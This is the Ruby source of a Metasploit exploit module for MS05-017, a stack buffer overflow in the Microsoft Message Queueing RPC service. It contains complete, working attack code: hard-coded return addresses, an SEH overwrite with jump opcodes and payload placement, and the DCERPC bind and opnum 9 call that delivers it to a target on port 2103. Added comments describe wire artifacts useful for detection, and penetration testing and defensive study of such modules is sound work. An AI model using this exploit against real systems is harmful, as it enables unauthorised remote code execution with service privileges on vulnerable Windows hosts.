GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/dcerpc/ms05_017_msmq.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# MS05-017: stack buffer overflow in the RPC interface of the Microsoft
# Message Queueing (MSMQ) service.
#
# The module binds to the MSMQ DCERPC interface over TCP (RPORT, default
# 2103), builds an over-long queue path and sends it with opnum 9. The
# position of the SEH overwrite inside that path depends on the length of
# the target's NetBIOS hostname, which is why HNAME is a required option
# (see #exploit). The bind UUID, port and opnum below are the observable
# artifacts of this exploit on the wire.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  # DCERPC mixin: connect / dcerpc_handle / dcerpc_bind / dcerpc.call.
  # Seh mixin: generate_seh_payload, used for the Windows XP return slot.
  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::Seh

  # Module metadata and options.
  #
  # @param info [Hash] base module info, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MS05-017 Microsoft Message Queueing Service Path Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in the RPC interface
          to the Microsoft Message Queueing service. The offset to the
          return address changes based on the length of the system
          hostname, so this must be provided via the 'HNAME' option.
          Much thanks to snort.org and Jean-Baptiste Marchand's
          excellent MSRPC website.
        },
        'Author' => [ 'hdm' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2005-0059'],
          [ 'OSVDB', '15458'],
          [ 'MSB', 'MS05-017'],
          [ 'BID', '13112'],
        ],
        # Runs in the context of the MSMQ service process
        'Privileged' => true,
        'Payload' => {
          'Space' => 1024,
          # Bytes the encoded payload must avoid: NUL, LF, CR, backslash,
          # underscore, slash, dot, 0xff. Several are path separators,
          # presumably because the payload travels inside a queue path
          # string — confirm against the MSMQ path grammar.
          'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e\xff",
          'StackAdjustment' => -3500
        },
        # A single target with two candidate return addresses in mqsvc.exe:
        # Rets[0] is written at the Windows 2000 offset, Rets[1] is used
        # for the Windows XP SEH record (see #exploit).
        'Targets' => [
          [
            'Windows 2000 ALL / Windows XP SP0-SP1 (English)',
            {
              'Platform' => 'win',
              'Rets' => [ 0x004014e9, 0x01001209 ] # mqsvc.exe
            },
          ],
        ],
        'DisclosureDate' => '2005-04-12',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # Change the default port values to point at MSMQ
    register_options(
      [
        Opt::RPORT(2103),
        OptString.new('HNAME', [ true, 'The NetBIOS hostname of the target' ]),
      ]
    )
  end

  # Filter hook used by automated exploitation flows (per the comment
  # below). Normalises RPORT and refuses to run without HNAME.
  #
  # @return [Boolean] false when HNAME is unset (the SEH offset cannot be
  #   computed without it), true otherwise
  def autofilter
    # Common vulnerability scanning tools report port 445/139
    # due to how they test for the vulnerability. Remap this
    # back to 2103 for automated exploitation

    rport = datastore['RPORT'].to_i
    # `or` binds more loosely than `||`; it is harmless here only because
    # both operands are complete comparisons.
    if (rport == 445 or rport == 139)
      datastore['RPORT'] = 2103
    end

    # The NetBIOS hostname is required to exploit this bug reliably.
    if (!(datastore['HNAME']))
      # XXX automatically determine the hostname
      return false
    end

    true
  end

  # Builds the malformed queue path, sends it to the MSMQ RPC interface
  # and hands control to the payload handler.
  #
  # Wire sequence (a useful detection reference): TCP connect to RPORT,
  # DCERPC bind to fdb3a030-065f-11d1-bb9b-00a024ea5525 v1.0, then one
  # call to opnum 9 whose stub holds six NDR longs and a ~4 KB unicode
  # string beginning with "OS:<HNAME>\PRIVATE$\".
  #
  # @return [void]
  def exploit
    # MSMQ supports three forms of queue names, the two we can use are
    # the IP address and the hostname. If we use the IP address via the
    # TCP: format, the offset to the SEH frame will change depending on
    # the length of the real hostname. For this reason, we force the user
    # to supply us with the actual hostname.

    # Formats: DIRECT=TCP:IPAddress\QueueName DIRECT=OS:ComputerName\QueueName

    queue_name = "OS:#{datastore['HNAME']}"
    # Two bytes per character: the offsets below are measured on the
    # unicode (two-byte) form of the path that unicode() produces.
    queue_hlen = datastore['HNAME'].length * 2
    queue_path = unicode(queue_name + '\\PRIVATE$\\')

    # 4000 bytes of filler that avoids the payload's bad characters
    buf = rand_text_english(4000, payload_badchars)

    # Windows 2000 SEH offset goes first
    # Rets[0] is written little-endian at the handler slot; the two bytes
    # four positions before it are the x86 short-jump opcode (EB 22),
    # presumably landing in the filler beyond the SEH record.
    buf[372 - queue_hlen + 0, 4] = [ target['Rets'][0] ].pack('V')
    buf[372 - queue_hlen - 4, 2] = "\xeb\x22"

    # Windows XP SEH offset goes second
    # generate_seh_payload (Seh mixin) builds the SEH record for Rets[1];
    # presumably it also carries the payload — confirm in the mixin.
    seh = generate_seh_payload(target['Rets'][1])
    buf[400 - queue_hlen - 4, seh.length] = seh

    # Append the path to the location and null terminate it
    queue_path << buf << "\x00\x00"

    # Get the unicode length of this string
    # NOTE(review): the result is discarded, so this statement has no effect.
    queue_path.length

    connect
    print_status("Trying target #{target.name}...")

    # MSMQ RPC interface UUID / version, over ncacn_ip_tcp on RPORT
    handle = dcerpc_handle('fdb3a030-065f-11d1-bb9b-00a024ea5525', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
    print_status("Binding to #{handle} ...")
    dcerpc_bind(handle)
    print_status("Bound to #{handle} ...")

    # Opnum 9 stub: six NDR longs followed by the conformant/varying
    # unicode queue path. The meaning of the individual longs is not
    # documented here — TODO confirm against the MSRPC reference cited
    # in the description.
    stubdata =
      NDR.long(1) +
      NDR.long(1) +
      NDR.long(1) +
      NDR.long(3) +
      NDR.long(3) +
      NDR.long(2) +
      NDR.UnicodeConformantVaryingStringPreBuilt(queue_path)

    print_status('Sending exploit ...')

    dcerpc.call(9, stubdata)

    # If the server answered, classify the four-byte status it returned
    # (0xc00e0020 / 0xc00e001e little-endian); anything else is dumped
    # as hex. `and` is used with the same precedence caveat as in
    # autofilter.
    if (!dcerpc.last_response.nil? and !dcerpc.last_response.stub_data.nil?)
      case dcerpc.last_response.stub_data
      when "\x20\x00\x0e\xc0"
        print_status('The server rejected our request, the HNAME parameter could be incorrect')
      when "\x1e\x00\x0e\xc0"
        print_status('The server does not appear to be exploitable')
      else
        print_status('An unknown response was received from the server:')
        print_status('>> ' + dcerpc.last_response.stub_data.unpack('H*')[0])
      end
    end

    # Let the framework handler service the payload connection, then
    # tear down the RPC transport.
    handler
    disconnect
  end
end